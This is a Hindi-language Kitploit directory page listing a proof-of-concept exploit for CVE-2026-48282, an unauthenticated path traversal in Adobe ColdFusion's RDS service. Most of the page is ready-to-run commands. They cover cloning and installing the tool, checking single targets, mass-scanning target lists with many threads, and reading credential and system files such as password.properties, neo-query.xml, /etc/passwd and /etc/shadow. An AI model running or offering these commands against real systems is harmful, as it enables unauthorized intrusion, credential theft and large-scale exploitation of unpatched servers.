Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-48282 — CVE-2026-48282 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Adobe ColdFusion RDS में एक गंभीर पाथ ट्रैवर्सल जो बिना प्रमाणीकरण के फ़ाइल पढ़ने/लिखने और RCE को सक्षम बनाता है। सिंगल-टार्गेट और मास स्कैनिंग को मल्टी-थ्रेडेड फ़ाइल निष्कर्षण के साथ समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/imbas007/cve-2026-48282
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubimbas007/cve-2026-48282

CVE-2026-48282

CVE-2026-48282 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Adobe ColdFusion RDS में एक गंभीर पाथ ट्रैवर्सल जो बिना प्रमाणीकरण के फ़ाइल पढ़ने/लिखने और RCE को सक्षम बनाता है। सिंगल-टार्गेट और मास स्कैनिंग को मल्टी-थ्रेडेड फ़ाइल निष्कर्षण के साथ समर्थन करता है।

रिपॉजिटरी देखें
2462 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-48282-POC

CVE-2026-48282 Adobe ColdFusion के Remote Development Service (RDS) में एक path traversal भेद्यता है, जिसका CVSS स्कोर 10.0 (Critical) है। यह बिना प्रमाणीकरण के हमलावरों को /CFIDE/main/ide.cfm एंडपॉइंट के माध्यम से मनमानी फ़ाइलें पढ़ने और लिखने की अनुमति देता है, जिससे Remote Code Execution (RCE) हो सकता है।

स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/<username>/CVE-2026-48282.git
cd CVE-2026-48282

# Install dependencies (only requires `requests`)
pip install -r requirements.txt

उपयोग

एकल लक्ष्य (-t)

root@kitploit:~
# Check vulnerability
python cve-2026-48282.py -t https://target.com --check

# Read files
python cve-2026-48282.py -t https://target.com --read /etc/passwd
python cve-2026-48282.py -t https://target.com --read "C:\\Windows\\win.ini"
python cve-2026-48282.py -t https://target.com --read "C:\\ColdFusion2023\\cfusion\\lib\\password.properties"

# Browse directories
python cve-2026-48282.py -t https://target.com --browse "C:\\"
python cve-2026-48282.py -t https://target.com --browse "C:\\inetpub\\wwwroot"

सूची मोड (-l) — एकाधिक लक्ष्यों को स्कैन करें

root@kitploit:~

# Basic mass scan
python cve-2026-48282.py -l targets.txt --check

# More threads + save results
python cve-2026-48282.py -l targets.txt --check --threads 30 -o vuln.txt

# Scan + auto-read canary file on any vulnerable target found
python cve-2026-48282.py -l targets.txt --check --read "C:\\Windows\\win.ini" -o results.txt

संवेदनशील फ़ाइलें पढ़ें

root@kitploit:~

Once confirmed vulnerable, extract credentials and configuration:

# ColdFusion admin password hash
python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\password.properties"

# Database connection strings (neo-query.xml)
python cve-2026-48282.py -t http://target.com --read "C:\\CFusionMX7\\lib\\neo-query.xml"

# Linux targets
python cve-2026-48282.py -t https://target.com --read /etc/passwd
python cve-2026-48282.py -t https://target.com --read /etc/shadow

छवि
टूल डाउनलोड करें